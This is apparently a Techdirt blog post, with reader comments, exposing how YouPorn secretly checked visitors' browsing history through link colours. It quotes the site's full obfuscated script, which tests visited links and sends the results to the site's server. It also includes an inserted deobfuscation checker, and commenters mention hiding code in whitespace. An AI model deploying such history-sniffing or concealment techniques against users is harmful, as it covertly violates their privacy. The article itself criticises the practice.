How YouPorn Tries To Hide That It's Spying On Your Browsing History
from the what,-no-rot-13? dept
There's a fair bit of attention being paid to a Forbes article about some new research concerning how a bunch of websites, including YouPorn, are exploiting a simple security hole to see what other sites you've visited:

How does it work? It's based on your browser changing the color of links you've already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color "purple," meaning you've clicked them before.

This isn't a huge surprise, but what I found most fascinating was how YouPorn sought to hide this bit of javascript by "encrypting" it. And by "encrypting" it, I mean switching letters one letter up in the alphabet. As Kashmir Hill explains:

The script on YouPorn’s site that checks a user’s history (which you can see for yourself by going to the site and checking out its html with “View Source”) looks like this:

<script type="text/javascript">
function ypol(){var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn",
2:"bevmugsjfoegjoefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn",
5:"yoyy/dpn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn",
8:"yibntufs/dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn",
11:"csb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn",
14:"gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dpn",
17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nbyqpso/dpn",
20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsopsbnb/dpn"};
var g=[];for(var m in k){var d=k[m];
var a="";for(var f=0;f<d.length;f++)
{a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false;
for(var j in {"http://":"","http://www.":""})
{var l=document.createElement("a");
l.href=j+a;document.getElementById("ol").appendChild(l);
var e="";if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color}
else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")}
if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}}
var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img");
c.src="http://ol.youporn.com/blank.gif?id="+b;document.getElementById("ol").appendChild(c)}ypol();
</script>

That list of gibberish contains the sites that YouPorn is checking to see if you’ve visited, but disguises them with a bit o’ simple cryptography. Dial back each letter by one, so “qpsoivc/dpn”, for example, becomes “pornhub.com.”

What's amazing is that anyone actually thought this was a worthwhile move. It's not that hard to "decrypt" and it's almost obvious to the naked eye because it's not too difficult to figure out how the "encryption" (and I use that word loosely) works just by noticing all the terms that end in /dpn. You'd think even a rot-13 would throw a few more people off the scent.
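The decoding described above, turned into a check a reviewer can run over script source. This is an added example, not code from the article or from the site: it pulls string literals out of a script and reports the character-code shift that turns the most of them into hostnames. The function names and the sample input are assumptions made for the illustration.

```javascript
// Added example: flag string tables in a script that decode to hostnames
// under a small character-code shift (the scheme the article describes).

// Hostname shape: dot-separated labels ending in an alphabetic TLD.
const HOSTNAME = /^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$/;

// Shift every character code by `delta`. This is not an alphabet rotation:
// "/" (0x2f) becomes "." (0x2e) and "{" (0x7b) becomes "z" (0x7a).
function shiftString(s, delta) {
  return Array.from(s, ch => String.fromCharCode(ch.charCodeAt(0) + delta)).join("");
}

// Pull the contents of double- or single-quoted literals out of script source.
function stringLiterals(source) {
  const out = [];
  const re = /"([^"\\\n]*)"|'([^'\\\n]*)'/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

// Try each shift in [-maxShift, maxShift] and return the one that turns the
// most literals into hostnames. Literals that already look like hostnames are
// skipped, since they are not hidden.
function findShiftedHostnames(source, maxShift = 3) {
  const literals = stringLiterals(source).filter(s => s.length > 3 && !HOSTNAME.test(s));
  let best = { delta: 0, hosts: [] };
  for (let delta = -maxShift; delta <= maxShift; delta++) {
    if (delta === 0) continue;
    const hosts = literals.map(s => shiftString(s, delta)).filter(h => HOSTNAME.test(h));
    if (hosts.length > best.hosts.length) best = { delta, hosts };
  }
  return best;
}

// Constructed sample: a few table entries copied from the script quoted above,
// plus literals from the same script that should not be flagged.
const SAMPLE = 'var k={0:"qpsoivc/dpn",4:"uvcf9/dpn",11:"csb{{fst/dpn",21:"bfco/ofu"};' +
               'var e="";if(e=="rgb(12, 34, 56)"){}for(var j in {"http://":""}){}';

console.log(findShiftedHostnames(SAMPLE));
```

A table of literals that only becomes a list of third-party hostnames after a shift is a useful review signal on its own, whatever the script goes on to do with them.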
Filed Under: browsers, encryption, history, javascript, spying
Companies: youporn
Reader Comments
TANSTAAFL
#corrections
should be: scent
Have a good day, and I wish I could check this out for myself at work. ;)
Silly techdirt
Re: Silly techdirt
And, meh, this is a common little trick that browsers are already "fixing" pretty quickly.
This is fixed in Firefox 4, see http://dbaron.org/mozilla/visited-privacy and https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector for the details. The relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=147777.
If you are still using Firefox 3, the Link Status extension (https://addons.mozilla.org/pt-BR/firefox/addon/12312/) has a checkbox to disable the visited link color, and it shows a star on the status bar if the link is visited (so you do not lose the ability to know if you have already visited that link).
Re:
NoScript isn't just JS whitelisting, after all. When you set "Scripts Globally Allowed (dangerous)", you still get the XSS-filter, clickjacking protection, ABE (protection against router exploits bounced off your browser), etc.
Personally I think it is dumb because it can be "decrypted" or deobfuscated by just running the script with a few modifications.
Re:
I think not, although it might be considered blurring.
It's to get past nanny and keyword checkers on scripts.
It takes away all the nasty keywords that are used by that type of protection software.
would this classify as DMCA...
Awesome
Old news, but it's still a good refresher.
I told him, straight up: "No. It is not my responsibility to leave open a potential security risk for the sake of convenience for either of us. Fix your [removed] cookie problem."
I find it quite interesting people refuse to take responsibility for their actions when things like this appear.
What, is it really difficult to remember one username and several passwords at various sites? Clean out the browser history upon close? Stop using idiotic add-ons to store sensitive information, such as CC numbers?
When people, using these features, then turn and complain about compromises, I can only think "relish in your own stupidity" because they want short cuts, not responsible actions.
Then again, now that there's an ever-increasing demand for "password strength" patterns so convoluted they require people to write them down just so they can remember them, I can't really blame them for using software to remember it for them.
Hence why "webmaster" is now in quotes. Most aren't masters at all, but idiots.
See you around the next "vulnerability" to laziness.
>:)
oh oh
meh
HAHA!
Re: HAHA!
If you get to those sites and enable them to watch whatever you want to watch, you are disabling the protection those things had to offer.
Flash can access the OS directly and put files in your PC. What privacy or security is that?
Same goes for Java (not to be confused with JavaScript; they are different).
Given that porn websites are hostile and many of them will get hacked and carry malicious payloads, people should be careful enabling anything in there.
There are a number of
This was just lazy/inexperienced work.
they should have used Billy Hoffman's javascript dehydration technique (http://blip.tv/file/3684946 ~ 50 min mark) -- it hides your javascript in whitespace (tabs and spaces being 1s and 0s) -- brilliant and pure evil
Nothing new
Ignore them.
Fin.